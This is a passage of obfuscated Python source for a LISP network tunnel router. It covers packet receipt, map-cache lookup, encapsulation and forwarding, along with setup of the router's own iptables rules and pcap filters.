OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , oOo0oO )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if ( device != input_interface ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 4 - 4: I1IiiI % I11i
return
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
II1i1i1iII1 = lisp . lisp_decent_push_configured
if ( II1i1i1iII1 ) :
oOo000 = packet . inner_dest . is_multicast_address ( )
IIi = packet . inner_source . is_local ( )
II1i1i1iII1 = ( IIi and oOo000 )
if 27 - 27: OOooOOo % Ii1I
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if ( II1i1i1iII1 == False ) :
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
II11 = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( II11 ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , II11 , oO0oIIII )
else :
Iiii11iIi1 = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( Iiii11iIi1 ,
input_interface ) )
return
if 40 - 40: I11i % OoO0O00 . I1Ii111
if 84 - 84: OoOoOO00 % ooOoO0o - OoOoOO00 . o0oOOo0O0Ooo
if 5 - 5: OoOoOO00 * I1Ii111 - I1ii11iIi11i / iIii1I11I1II1 % oO0o + IiII
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 51 - 51: I1Ii111 * II111iiii % ooOoO0o
if 98 - 98: OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if ( packet . inner_version == 4 ) :
packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 33 - 33: I1Ii111
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
OoO000O = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if 94 - 94: OoOoOO00 . O0 / Ii1I . I1ii11iIi11i - i1IIi
if 26 - 26: OoO0O00 - OOooOOo . o0oOOo0O0Ooo
if 65 - 65: I1ii11iIi11i % O0 % iIii1I11I1II1 * Ii1I
if 31 - 31: Ii1I
if 44 - 44: OoOoOO00 - iIii1I11I1II1 - Oo0Ooo
if 80 - 80: iIii1I11I1II1 * I1Ii111 % I11i % Oo0Ooo
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
OOOOoo = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( OOOOoo and OoO000O and OoO000O . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
o000 = packet . inner_dest
o000 . instance_id = OOOOoo
OoO000O = lisp . lisp_map_cache_lookup ( packet . inner_source , o000 )
if 94 - 94: o0oOOo0O0Ooo + O0 / I11i . I1IiiI + OOooOOo . iIii1I11I1II1
if 62 - 62: OoOoOO00 / I1IiiI - I1ii11iIi11i - I1IiiI + i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if ( OoO000O == None or OoO000O . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_source ,
packet . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if ( OoO000O and OoO000O . is_active ( ) and OoO000O . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( OoO000O . print_eid_tuple ( ) , False ) ) )
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
OoO000O . stats . increment ( len ( packet . packet ) )
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
iiIii1IIi , ii1IiIiI1 , OOOoOo00O , O0ooOo0o0Oo , OooO0oOo = OoO000O . select_rloc ( packet , oO0oIIII )
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if ( iiIii1IIi == None and OooO0oOo == None ) :
if ( O0ooOo0o0Oo == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
lisp . dprint ( "No reachable RLOCs found" )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if ( iiIii1IIi and iiIii1IIi . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet )
return
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
packet . outer_tos = packet . inner_tos
packet . outer_ttl = packet . inner_ttl
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if ( iiIii1IIi ) :
packet . outer_dest . copy_address ( iiIii1IIi )
I111I11I111 = packet . outer_dest . afi_to_version ( )
packet . outer_version = I111I11I111
iiiiI11ii = lisp . lisp_myrlocs [ 0 ] if ( I111I11I111 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 96 - 96: iII111i . O0 / iII111i % O0
packet . outer_source . copy_address ( iiiiI11ii )
if 94 - 94: IiII + I1Ii111 / OOooOOo
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 91 - 91: I11i / i1IIi * i1IIi
if 25 - 25: iIii1I11I1II1 . OOooOOo * oO0o - Ii1I
if 55 - 55: OoOoOO00
if 63 - 63: IiII * OoOoOO00 * ooOoO0o
if 92 - 92: I1ii11iIi11i / O0
if ( packet . encode ( OOOoOo00O ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 80 - 80: o0oOOo0O0Ooo - OOooOOo + OoooooooOO
if 98 - 98: OOooOOo + i1IIi . I1IiiI - II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
ooO00O00oOO = Oooo0000 if I111I11I111 == 6 else Ii1IIii11
packet . send_packet ( ooO00O00oOO , packet . outer_dest )
if 40 - 40: iII111i . oO0o + I1IiiI + I1ii11iIi11i + I1Ii111
elif ( OooO0oOo ) :
if 26 - 26: iIii1I11I1II1
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
II1Iii = OooO0oOo . rle_nodes [ 0 ] . level
O0oooo0OoO0oo = len ( packet . packet )
for IiiiIi1iI1iI in OooO0oOo . rle_forwarding_list :
if ( IiiiIi1iI1iI . level != II1Iii ) : return
if 98 - 98: OoO0O00 / OOooOOo * I1ii11iIi11i / oO0o
packet . outer_dest . copy_address ( IiiiIi1iI1iI . address )
if ( II1i1i1iII1 ) : packet . inner_dest . instance_id = 0xffffff
I111I11I111 = packet . outer_dest . afi_to_version ( )
packet . outer_version = I111I11I111
iiiiI11ii = lisp . lisp_myrlocs [ 0 ] if ( I111I11I111 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 64 - 64: oO0o - I1IiiI / iII111i - OoO0O00
packet . outer_source . copy_address ( iiiiI11ii )
if 37 - 37: i11iIiiIii / iII111i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 85 - 85: i11iIiiIii + I1Ii111 * OoOoOO00
if 1 - 1: i1IIi / Oo0Ooo . OoO0O00
if ( packet . encode ( None ) == None ) : return
if 57 - 57: I11i . Oo0Ooo + II111iiii
if 43 - 43: I1Ii111 % iII111i
if 69 - 69: iII111i % OoO0O00
if 86 - 86: oO0o / oO0o
packet . print_packet ( "Replicate-to-L{}" . format ( IiiiIi1iI1iI . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
oo00ooOoo = len ( packet . packet ) - O0oooo0OoO0oo
packet . packet = packet . packet [ oo00ooOoo : : ]
if 28 - 28: Ii1I
if 1 - 1: Ii1I
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
del ( packet )
return
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
def O0oOOo0o ( device , not_used , packet ) :
if 50 - 50: iII111i . I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
i1i1IiIiIi1Ii = 4 if device == "lo0" else 14
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
if ( lisp . lisp_frame_logging ) :
i1I = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
iiI1I1IIi11i1 = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( i1I , iiI1I1IIi11i1 ) )
if 45 - 45: ooOoO0o % o0oOOo0O0Ooo - ooOoO0o
if 31 - 31: IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
Oo = ""
oO00oOOo0Oo = False
OOo0oO00ooO00 = device
if ( i1i1IiIiIi1Ii == 14 ) :
iIiIIi1 , IIiIIIIii , iI , oO00oOOo0Oo = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
Oo = lisp . lisp_format_macs ( IIiIIIIii , iI )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : i1i1IiIiIi1Ii += 4
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if ( int ( iI [ 1 ] , 16 ) & 1 ) : oO00oOOo0Oo = True
if 70 - 70: I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
if 93 - 93: i1IIi
ooOOOo = struct . unpack ( "H" , packet [ i1i1IiIiIi1Ii - 2 : i1i1IiIiIi1Ii ] ) [ 0 ]
ooOOOo = socket . ntohs ( ooOOOo )
if ( ooOOOo == 0x8100 ) :
OO000oOoo0O = struct . unpack ( "I" , packet [ i1i1IiIiIi1Ii : i1i1IiIiIi1Ii + 4 ] ) [ 0 ]
OO000oOoo0O = socket . ntohl ( OO000oOoo0O )
OOo0oO00ooO00 = "vlan" + str ( OO000oOoo0O >> 16 )
i1i1IiIiIi1Ii += 4
elif ( ooOOOo == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 9 - 9: oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( lisp . lisp_l2_overlay ) : i1i1IiIiIi1Ii = 0
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
IIIii ( packet [ i1i1IiIiIi1Ii : : ] , device , OOo0oO00ooO00 , Oo , oO00oOOo0Oo )
return
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
if 62 - 62: o0oOOo0O0Ooo - Ii1I * OoOoOO00 - i11iIiiIii % ooOoO0o
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
o00Ooo0 = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
O0O00O = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
O0O00O += sources + lisp . lisp_get_all_addresses ( )
for iIi1Ii in O0O00O :
IiI1IIIII1I = "" if iIi1Ii . find ( ":" ) == - 1 else "6"
os . system ( o00Ooo0 . format ( IiI1IIIII1I , iIi1Ii ) )
if 35 - 35: Ii1I - Ii1I + i1IIi - O0 - I1Ii111
if 58 - 58: OoOoOO00 - iII111i - OoooooooOO
if 96 - 96: iIii1I11I1II1
if 82 - 82: OoOoOO00 + O0 - IiII % oO0o * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo
if 39 - 39: OOooOOo / I1ii11iIi11i / I1IiiI * I1Ii111
if 44 - 44: O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / O0 - I11i
if 83 - 83: IiII * I11i / Oo0Ooo
if ( lisp . lisp_pitr == False ) :
o00Ooo0 = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
iIIIiI = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for i1oOOoo0o0OOOO in sources :
if ( i1oOOoo0o0OOOO in dyn_eids ) : continue
IiI1IIIII1I = "" if i1oOOoo0o0OOOO . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and i1oOOoo0o0OOOO . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and i1oOOoo0o0OOOO . find ( ":" ) == - 1 ) : continue
if ( commands . getoutput ( iIIIiI . format ( IiI1IIIII1I , i1oOOoo0o0OOOO , O0OOO0OOoO0O ) ) == "" ) :
continue
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
os . system ( o00Ooo0 . format ( IiI1IIIII1I , i1oOOoo0o0OOOO , O0OOO0OOoO0O ) )
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
I1I11ii = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for i1oOOoo0o0OOOO in sources :
IiI1IIIII1I = "" if i1oOOoo0o0OOOO . find ( ":" ) == - 1 else "6"
os . system ( I1I11ii . format ( IiI1IIIII1I , i1oOOoo0o0OOOO ) )
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if 60 - 60: OoO0O00
oO00Ooo0oO = commands . getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
oO00Ooo0oO += commands . getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( oO00Ooo0oO ) )
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
oo0oO = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
oo0oO += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 58 - 58: IiII + iIii1I11I1II1
oo0oO += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
oo0oO += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
os . system ( oo0oO )
o0oO0oO0O = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( o0oO0oO0O , oo0oO ) )
if 18 - 18: Oo0Ooo
return
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
ii = "(not ether proto 0x806)"
I1Iiiiiii = " or (udp src port 4342 and ip[28] == 0x28)"
II111iIII1Ii = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
iIi1Iii111I = ""
IIi11i11 = ""
for i1oOOoo0o0OOOO in sources :
iIi1Iii111I += "{}" . format ( i1oOOoo0o0OOOO )
if ( i1oOOoo0o0OOOO not in dyn_eids ) : IIi11i11 += "{}" . format ( i1oOOoo0o0OOOO )
if ( sources [ - 1 ] == i1oOOoo0o0OOOO ) : break
iIi1Iii111I += " or "
if ( i1oOOoo0o0OOOO not in dyn_eids ) : IIi11i11 += " or "
if 18 - 18: iIii1I11I1II1 + I11i * I1IiiI - OOooOOo / I1IiiI
if ( IIi11i11 [ - 4 : : ] == " or " ) : IIi11i11 = IIi11i11 [ 0 : - 4 ]
if 78 - 78: I11i . IiII
if 38 - 38: OoOoOO00 + IiII
if 15 - 15: Oo0Ooo + I11i . ooOoO0o - iIii1I11I1II1 / O0 % iIii1I11I1II1
if 86 - 86: I1IiiI / oO0o * Ii1I
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
o0oOO00 = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
o0oOO00 = ( o0oOO00 != "" and o0oOO00 [ 0 ] == " " )
ii11iiIi = lisp . lisp_get_loopback_address ( ) if ( o0oOO00 ) else None
if 48 - 48: IiII % I11i
i1I1III1i1i = ""
i1I11 = lisp . lisp_get_all_addresses ( )
for iIi1Ii in i1I11 :
if ( iIi1Ii == ii11iiIi ) : continue
i1I1III1i1i += "{}" . format ( iIi1Ii )
if ( i1I11 [ - 1 ] == iIi1Ii ) : break
i1I1III1i1i += " or "
if 9 - 9: O0 % OOooOOo * iIii1I11I1II1 * oO0o + OoooooooOO + I1ii11iIi11i
if 7 - 7: ooOoO0o / iIii1I11I1II1 / I1Ii111 + ooOoO0o - i1IIi
if ( iIi1Iii111I != "" ) :
iIi1Iii111I = " and (src net {})" . format ( iIi1Iii111I )
if 75 - 75: II111iiii + OOooOOo
if ( IIi11i11 != "" ) :
IIi11i11 = " and not (dst net {})" . format ( IIi11i11 )
if 28 - 28: I1IiiI
if ( i1I1III1i1i != "" ) :
i1I1III1i1i = " and not (dst host {})" . format ( i1I1III1i1i )
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
